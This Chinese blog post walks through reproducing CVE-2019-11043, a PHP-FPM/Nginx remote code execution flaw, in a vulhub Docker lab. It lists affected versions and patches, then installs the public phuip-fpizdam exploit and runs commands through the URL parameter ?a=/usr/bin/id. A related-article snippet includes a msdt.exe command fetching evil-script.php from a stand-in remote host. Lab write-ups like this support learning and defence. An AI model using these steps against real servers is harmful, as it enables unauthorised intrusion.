PHP远程代码执行漏洞(CVE-2019-11043)复现

最新推荐文章于 2024-05-23 18:33:01 发布
最新推荐文章于 2024-05-23 18:33:01 发布
阅读量1.3k 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: docker nginx linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43606134/article/details/107646467
版权

漏洞说明#
是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。
向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。
该漏洞需要在nginx.conf中进行特定配置才能触发
漏洞编号#
CVE-2019-11043
影响范围#
在 Nginx + PHP-FPM 环境下,当启用了上述 Nginx 配置后,以下 PHP 版本受本次漏洞影响,另外,PHP 5.6版本也受此漏洞影响,但目前只能 Crash,不可以远程代码执行:
PHP 7.0 版本
PHP 7.1 版本
PHP 7.2 版本
PHP 7.3 版本
修复建议#
将PHP 7.1.X更新至7.1.33
将PHP 7.2.X更新至7.2.24
将PHP 7.3.X更新至7.3.11

实验环境
攻击机:kali 2020.2
靶机:CentOS Linux7
项目地址:
https://github.com/vulhub/vulhub

基础环境搭建
查看我以前的博客自行搭建

实验环境搭建
项目地址

https://github.com/vulhub/vulhub

下载后上传至任意目录,进入目录

/vulhub-master/vulhub-master/php/CVE-2019-11043

启动docker编译

docker-compose up -d

启动环境之后,就可以看到漏洞环境的默认页面。在此为http://127.0.0.1:8080/index.php
在这里插入图片描述
复现步骤

首先kali安装go环境

wget  -c https://storage.googleapis.com/golang/go1.13.3.linux-amd64.tar.gz
tar -C /usr/local -xzf go1.13.3.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin
vim 编辑/etc/profile
文件最后加上export PATH=$PATH:/usr/local/go/bin
执行 source /etc/profile 命令 就安装成功了

在这里插入图片描述
下载github上公开的exp

go get github.com/neex/phuip-fpizdam

然后编译

go install github.com/neex/phuip-fpizdam

使用exp攻击demo网站
在这里插入图片描述
http://192.168.91.133:8080/index.php?a=/usr/bin/id

在这里插入图片描述
攻击成功
还可以进行shell反弹,感兴趣的可以深入研究!

m__ing
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php漏洞几十个,【漏洞预警】PHP7被发现三个0day漏洞,其中一个还
weixin_36123682的博客
03-26 1806
Check Point的安全性研究者在PHP7上发觉了3个比较严重0day系统漏洞,而且在其中还有一个0day未被恢复。假如这种系统漏洞被攻击者取得成功利用不良影响十分比较严重,可造成 全世界80%的网址被攻击者良好控制。PHP介绍PHP是一种通用性开源系统脚本制作预言,消化吸收了C预言、Java和Perl的特性,更非常容易被开发人员学习培训应用。用PHP作出的动态性网页页面与别的的计算机语言对比...
CVE-2019-11043复现
hhiollk的博客
03-31 544
01 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码漏洞环境: 先把exp克隆到本地。 gitclonehttps://github.com/neex/phuip-fpizdam.git 安装go环境 wget -c h...
漏洞利用CVE-2019-11043 PHP 远程代码执行漏洞
weixin_43486390的博客
02-27 1161
本文借鉴了FLy_鹏程万里大佬的《Kali Linux下go语言环境搭建》 链接:https://blog.csdn.net/Fly_hps/article/details/81073316 整合了一些文章作为自己的笔记,以便后续记忆学习。 0x01 背景 9 月 26 日,PHP 官方发布漏洞通告,其中指出:使用 Nginx + php-fpm 的服务器,在部分配置下,存在远程代码执行漏洞。并且...
PHP7曝出三个高危0-day漏洞,还有一个仍未修复
weixin_34024034的博客
08-01 1161
PHP7出现三个高危0-day漏洞,可允许攻击者完全控制PHP网站。 这三个漏洞出现在PHP7的反序列化机制中,而PHP5的反序列机制也曾曝出漏洞,在过去几年中,黑客利用该漏洞将恶意代码编入客户机cookie并发送,从而入侵了Drupal、Joomla、Magento、vBulletin和PornHub等网站。 漏洞概况 最近,Check Point...
漏洞复现CVE-2019-11043PHP远程代码执行漏洞)信息安全论文_含漏洞复现完整过程_含Linux环境go语言编译环境安装
最新发布
Thmos_vader的博客
05-23 1292
CVE-2019-11043漏洞PHP的一个远程代码执行漏洞,该漏洞产生与Nginx利用fastcgi_split_path_info在处理带有 %0a 的请求时,会因为遇到换行符(%0a)导致PATH_INFO为空,最终可导致任意代码执行。 该漏洞普遍出现在Nginx+php-fpm环境中,且PHP版本在7.0-7.3之间。
PHP漏洞全解
04-15 971
针对PHP的网站主要存在下面几种攻击方式: 1、命令注入(Command Injection) 2、eval注入(Eval Injection) 3、客户端脚本攻击(Script Insertion) 4、跨网站脚本攻击(Cross Site Scripting, XSS) 5、SQL注入攻击(SQL injecti...
PHP网站常见一些安全漏洞及防御方法_php
liuhyusb的博客
01-02 550
一、常见PHP网站安全漏洞对于PHP漏洞,目前常见的漏洞有五种。分别是Session文件漏洞、SQL注入漏洞、脚本命令执行漏洞、全局变量漏洞和文件漏洞。这里分别对这些漏洞进行简要的介绍。1、session文件漏洞Session攻击是黑客最常用到的攻击手段之一。当一个用户访问某一个网站时,为了免客户每进人一个页面都要输人账号和密码,PHP设置了Session和Cookie用于方便用户的使用和访向。2、SQL注入漏洞
CVE-2019-11043PHP远程代码执行漏洞复现
永远是少年
12-11 2099
今天继续给大家介绍渗透测试相关知识,本文主要内容是CVE-2019-11043PHP远程代码执行漏洞复现。 一、CVE-2019-11043PHP远程代码执行漏洞)简介 二、CVE-2019-11043PHP远程代码执行漏洞漏洞环境搭建 三、CVE-2019-11043PHP远程代码执行漏洞漏洞利用工具安装 四、CVE-2019-11043PHP远程代码执行漏洞复现
php-7.0.33.tar.gz
04-23
php-7.0.33.tar.gz
验证php远程命令执行漏洞案例
Websec
09-17 2780
比如验证JBoss EJBInvokerServlet Marshalled Object RCE(CVE-2013-4810 ) 0x01:首先我们开启php的环境,如phpStudy,wamp等等,这里我们就使用phpStudy吧,进入php-5.5.38的目录(当前使用的这个php版本),将我们的test.php复制到这个目录即可  0x02:然后使用命令行进行验证即可,我们先进入到...
米酷CMS v7.0.3 sql注入漏洞审计及本地复现
sjyyyyyyyy的博客
12-24 955
米酷CMS v7.0.3 sql注入漏洞审计及本地复现米酷CMS v7.0.3 sql注入漏洞审计漏洞简介漏洞影响第一处注入第二处注入本地复现声明:本文旨在技术学习研究,请勿用于违法用途,否则后果自负。 米酷CMS v7.0.3 sql注入漏洞审计 漏洞简介 米酷影视管理系统是一套专为不同需求的站长而设计的影视管理系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需 3 分钟即可建立一个海量的视频讯息的行业网站。 米酷CMS v7.0.3版本admin/model/admin_ed
上传漏洞总结
had3s
04-26 1504
0x01 常规上传突破常见扩展名黑名单1234asp|asa|cer|cdx|aspx|ashx|ascx|asax php|php2|php3|php4|php5|asis|htaccess htm|html|shtml|pwml|phtml|phtm|js|jsp vbs|asis|sh|reg|cgi|exe|dll|com|bat|pl|cfc|cfm|ini特殊后缀1234jsp jsp...
CVE-2019-11043远程代码执行漏洞复现
qq_42133828的博客
11-02 6972
CVE-2019-11043远程代码执行漏洞复现 漏洞名称: php fastcgi 远程命令执行漏洞 漏洞类型: 远程代码执行漏洞 漏洞危害: 高危 漏洞来源: https://www.nginx.com/blog/php-fpm-cve-2019-11043-vulnerability-nginx/ 公布时间: 2019-10-28 涉及应用版本: <7.1.33PHP版本7.1.x ...
buuctf [PHP]CVE-2019-11043
qq_1873822的博客
03-25 457
漏洞描述 CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx + PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。 向Nginx + PHP-FPM的服务器 URL发送 %0a 时,服务器返回异常。 该漏洞需要在nginx.conf中进行特定配置才能触发。具体配置如下: location ~ [^/].php(/|KaTeX parse error: Can't use function '\.' in math mode at position 38: …pa
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行此命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值